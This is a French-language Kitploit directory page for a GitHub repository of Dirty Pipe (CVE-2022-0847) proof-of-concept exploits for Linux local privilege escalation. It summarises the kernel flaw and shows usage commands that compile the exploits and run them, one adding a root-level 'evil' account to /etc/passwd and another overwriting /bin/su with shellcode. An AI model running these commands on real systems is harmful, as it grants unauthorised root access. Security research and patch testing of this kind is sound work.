Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Dirty-Pipe-CVE-2022-0847-POCs — Exploits de preuve de concept pour CVE-2022-0847 (Dirty Pipe) permettant l'escalade de privilèges locale sur les noyaux Linux 5.8+ en écrasant des fichiers en lecture seule ou des binaires SUID. | Kitploit
Outils/GitHubGitHub/ajith737/dirty-pipe-cve-2022-0847-pocs
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationApprentissage et ÉducationExploitation de Binaires
GitHubajith737/dirty-pipe-cve-2022-0847-pocs

Dirty-Pipe-CVE-2022-0847-POCs

Exploits de preuve de concept pour CVE-2022-0847 (Dirty Pipe) permettant l'escalade de privilèges locale sur les noyaux Linux 5.8+ en écrasant des fichiers en lecture seule ou des binaires SUID.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
31il y a 3 ansPas encore vérifié

Dirty-Pipe-CVE-2022-0847-POCs

  • Auteur: Max Kellermann [email protected]
  • Contributeur: Bl4sty https://twitter.com/bl4sty Une nouvelle vulnérabilité Linux connue sous le nom de 'Dirty Pipe' permet aux utilisateurs locaux d'obtenir les privilèges root via des exploits disponibles publiquement.

Aujourd'hui, le chercheur en sécurité Max Kellermann a divulgué de manière responsable la vulnérabilité 'Dirty Pipe' et a déclaré qu'elle affecte le noyau Linux 5.8 et les versions ultérieures, même sur les appareils Android.

La vulnérabilité est suivie sous le nom CVE-2022-0847 et permet à un utilisateur non privilégié d'injecter et d'écraser des données dans des fichiers en lecture seule, y compris les processus SUID qui s'exécutent en tant que root.

Kellermann a découvert le bug après avoir traqué un bug qui corrompait les journaux d'accès d'un serveur web pour l'un de ses clients.

Ensuite, Bl4sty a écrit une autre version. Au lieu d'écraser un fichier comme /etc/passwd, il écrase un binaire SUID spécifié par l'utilisateur (comme /bin/su), injectant un shellcode qui est ensuite exécuté avec les permissions d'un utilisateur privilégié (c'est-à-dire root).

Exploit 1

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1 
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'

Exploit 2

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su

Pour une utilisation détaillée, référez-vous à : https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf

Télécharger l’outil